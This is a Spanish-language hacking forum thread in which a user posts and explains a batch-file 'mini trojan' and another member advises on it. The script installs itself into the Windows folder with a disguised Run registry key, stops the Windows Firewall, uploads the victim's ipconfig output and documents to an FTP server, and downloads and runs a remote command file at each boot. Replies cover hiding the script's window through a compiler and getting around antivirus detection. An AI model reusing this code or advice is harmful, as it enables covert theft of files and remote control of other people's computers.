 Autor
|
Tema: Mini Troyano por FTP [BATCH] (Leído 7,338 veces)
|
CaronteGold
 Desconectado
Mensajes: 339
|
Bueno creo este tema porque tengo unas cuantas dudas, estoy haciendo una especie de "troyano", por Batch.
Y quiero saber como lo puedo meter al registro de Windows, para que cada vez que se inicie se re-active.
También cómo poner un archivo llamado por ejemplo "órdenes" en el servidor y que lo abra y lo haga, como por ejemplo copiar un archivo del pc y mandarlo al servidor.
Y una última cosa, igual suena raro, pero por si es posible, quisiera saber si es posible que el batch al ejecutarse lo haga de forma silenciosa y no se vea que sube los archivos y eso....
El código:
[code] @echo off
set user=XXXX
set pass=XXXXX
set dominio=XXXXXXX
echo open %dominio%>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put info.txt>>datos.txt
echo bye>>datos.txt
ipconfig>>info.txt
ftp -s:datos.txt
del info.txt
del datos.txt
exit
Como ven es simple, pero básicamente es la primera cosa un poco decente que hago de batch. Un saludo, Edito: en ese código, el ejemplo a subir fue la IP , y los datos que te da al poner "ipconfig" en el ms-dos. E D I TO : Aquí el código del Mini-Troyano . @echo off
copy /y "%~dpnx0" "%windir%\"
reg add HKLM\software\microsoft\windows\currentversion\run /v "Actualización" /d C:\WINDOWS\Actualización.bat /f
cd \
net stop "Firewall de Windows/Conexi¢n compartida a Internet (ICS)"
set user=XXXXXX
set pass=XXXXXX
set dominio=XXXXXX
echo open %dominio%>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put %USERNAME%.txt>>datos.txt
echo put %homedrive%%homepath%\Mis Documentos\*.txt>>datos.txt
echo get ordenes.bat C:\WINDOWS\system32\ordenes.bat>>datos.txt
echo bye>>datos.txt
ipconfig>>%USERNAME%.txt
ftp -s:datos.txt
start C:\WINDOWS\system32\ordenes.bat
del %USERNAME%.txt
del datos.txt
pause>nul
exit Primero se copia a la carpeta de Windows ( por si es borrado ), y luego se añade al registro de Windows. Después por si tienen el Firewall de Windows y este detecta las conexiones FTP, pues lo desactiva. ( Obviamente con otro Firewall no funcionaría ) Luego en donde las XXXX, ponemos los datos. echo open %dominio%>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put %USERNAME%.txt>>datos.txt
echo get ordenes.bat C:\WINDOWS\system32\ordenes.bat>>datos.txt
echo bye>>datos.txt
Ese trozo es la información que tendrá que hacerse en cuanto se abra el FTP, primero se conecta, luego subirá el archivo %USERNAME% que justo debajo sale, subirá la IP de la víctima. ( eso es un ejemplo si queréis podéis quitarlo ), y luego descargará el archivo ordenes.bat, que tendremos que poner en nuestro servidor FTP, para que se descargue.( este se ponrá en la carpeta de system32) ipconfig>>%USERNAME%.txt
ftp -s:datos.txt
start C:\WINDOWS\system32\ordenes.bat
del %USERNAME%.txt
del datos.txt
pause>nul
exit
Aquí creará el archivo %username% ( nombre del usuario ), con dentro la ip, esto lo tomé como ejemplo, como dije podéis borrarlo y usar solo las ordenes mediante el archivo ordenes.bat Luego ftp-s:datos.txt, es el archivo que leerá el sistema para entrar al ftp y relizar las ordenes. Luego en start ........ordenes.bat, lo que hace es abrir el archivo ordenes.bat y ahí pondremos lo que queramos, el nombre tiene que ser ordenes y extensión .bat, si no no funcionará pero podéis cambiarlo y que se descargue lo que sea. Y obviamente, tiene que ser en lenguaje BATCH. ( como dije, podéis subir lo que queráis, una foto, un .exe, pero tenéis que cambiar el código). El archivo ordenes se abrirá cada reinicio, así que tenéis que cambiarlo si queréis realizar otras acciones. Luego para no dejar pruebas evidentes, se borra el archivo username, y datos. Si algo no funciona o hay alguna duda, aquí estoy. Se me olvidaba, para que haga todo de manera silenciosa ( sin aparecer en pantalla ) tenéis que usar un compilador, como Quick Batch File Compiler. Y en opciones modo Ghost. Yo uso uno portable, raro el que se instalaba me detectaba como virus el avast... no se porqué... pero si cambiáis el nombre o algo a veces deja... Saludos. [/code]
|
|
|
|
« Última modificación: 13 Octubre 2009, 23:29 pm por CaronteGold »
|
En línea
|
|
|
|
Novlucker
Ninja y
Colaborador
Desconectado
Mensajes: 10.683
Yo que tu lo pienso dos veces
|
Y quiero saber como lo puedo meter al registro de Windows, para que cada vez que se inicie se re-active. C:\>REG ADD /?
http://foro.elhacker.net/tutoriales_documentacion/manual_de_procesos_que_se_ejecutan_al_inicio_de_windows_xp-t146876.0.html También cómo poner un archivo llamado por ejemplo "órdenes" en el servidor y que lo abra y lo haga, como por ejemplo copiar un archivo del pc y mandarlo al servidor.
No me queda clara tu pregunta, ... que pueda recibir ordenes? supongo que con un bucle que registre el ftp cada cierto tiempo, baje y lea un archivo debería de ser suficiente. Y una última cosa, igual suena raro, pero por si es posible, quisiera saber si es posible que el batch al ejecutarse lo haga de forma silenciosa y no se vea que sube los archivos y eso.... Debes de empaquetar (alguno dirá compilar) el archivo con algún programa como QBFC o similar, o ejecutarlo por medio de un vbscript Te recomiendo  , porque son cosas que se han preguntado muuuchas veces  Saludos
|
|
|
|
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
CaronteGold
Desconectado
Mensajes: 339
|
Gracias por la rápida respuesta. Pues sobre lo de las órdenes, creo que es lo mismo que tu dices, pero no se hacerlo  , he subido un archivo llamado ordenes.txt , tenía unas cosas de prueba para que se metiesen dentro de info.txt y fuera subido, como por ejemplo, mando copiar una carpeta y subirla por ftp, pues lo subí luego puse start ordenes.txt, ( fijo que está mal) , y me daba error, decía que no se encontraba el archivo, el caso es que tampoco especifiqué nada, solo puse start ordenes.txt. Luego lo del compilador, pues ese programa lo tengo, pero sirve para transformalos a exe y no ver su código no ¿?, igual lo que tu dices es lo que pregunto, pero por si no se entendió bien, lo que quiero es que al subir los archivos y todo, esté como tapado, no se vea nada de nada, porque si acaso hubiese que subir una carpeta pesada, el usuario lo cancelaría al ver que se está subiendo una cosa. Saludos y gracias. EDITO: Cuando probé el bat la primera vez me saltó el firewall de windows, dando opción a continuar el bloqueo o desbloquear eso también se puede quitar creo , ¿no?, desbloquearlo automático o directamente quitar el firewall por mientras. |
|
|
|
« Última modificación: 29 Agosto 2009, 06:47 am por CaronteGold »
|
En línea
|
|
|
|
Novlucker
Ninja y
Colaborador
Desconectado
Mensajes: 10.683
Yo que tu lo pienso dos veces
|
he subido un archivo llamado ordenes.txt , tenía unas cosas de prueba para que se metiesen dentro de info.txt y fuera subido, como por ejemplo, mando copiar una carpeta y subirla por ftp, pues lo subí luego puse start ordenes.txt, ( fijo que está mal) , y me daba error, decía que no se encontraba el archivo, el caso es que tampoco especifiqué nada, solo puse start ordenes.txt.  ... donde pusiste el archivo ordenes.txt? en un servidor? o en tu pc? Si esta en el servidor FTP es lógico que no lo puedas ejecutar, y de ser así te recomendaría leer algo básico en lo posible Luego lo del compilador, pues ese programa lo tengo, pero sirve para transformalos a exe y no ver su código no ¿?, igual lo que tu dices es lo que pregunto, pero por si no se entendió bien, lo que quiero es que al subir los archivos y todo, esté como tapado, no se vea nada de nada, porque si acaso hubiese que subir una carpeta pesada, el usuario lo cancelaría al ver que se está subiendo una cosa. Esos programas tienen la opción de pasar el batch a un exe, y que el exe se ejecute en modo oculto (hide) EDITO: Cuando probé el bat la primera vez me saltó el firewall de windows, dando opción a continuar el bloqueo o desbloquear eso también se puede quitar creo , ¿no?, desbloquearlo automático o directamente quitar el firewall por mientras. Por ej: http://foro.elhacker.net/hacking_basico/detener_el_firewall_de_windows_xp_sp2-t183228.0.htmlEsto para el FW de win, de tener un "verdadero" firewall ya es casi imposible o por demás complicado Repito .. estos temas se han preguntado muchas veces Saludos
|
|
|
|
« Última modificación: 29 Agosto 2009, 07:03 am por Novlucker »
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
CaronteGold
Desconectado
Mensajes: 339
|
Si esta en el servidor FTP es lógico que no lo puedas ejecutar, y de ser así te recomendaría leer algo básico en lo posible
Está en el servidor FTP, y lo pregunto porque he visto en otro post de un foro que se podía hacer. Pero apenas explicaba algo. EDITO: He probado a compilar lo que llevo hecho, y cuando lo compilo ya sea modo normal o Ghost ( de forma silenciosa ) me lo detecta el antivirus :S Me parece extraño, porque no debería.
|
|
|
|
« Última modificación: 29 Agosto 2009, 18:00 pm por CaronteGold »
|
En línea
|
|
|
|
CaronteGold
Desconectado
Mensajes: 339
|
Bueno ya he terminado el "troyano" si se puede llamar así, ahora seguiré haciendo una especie de Controlador, o algo así, para memorizar funciones y que suba el bat "la orden" por ftp automático para que en cada reinicio la víctima lo descargue, y abra.
|
|
|
|
|
En línea
|
|
|
|
|
 |
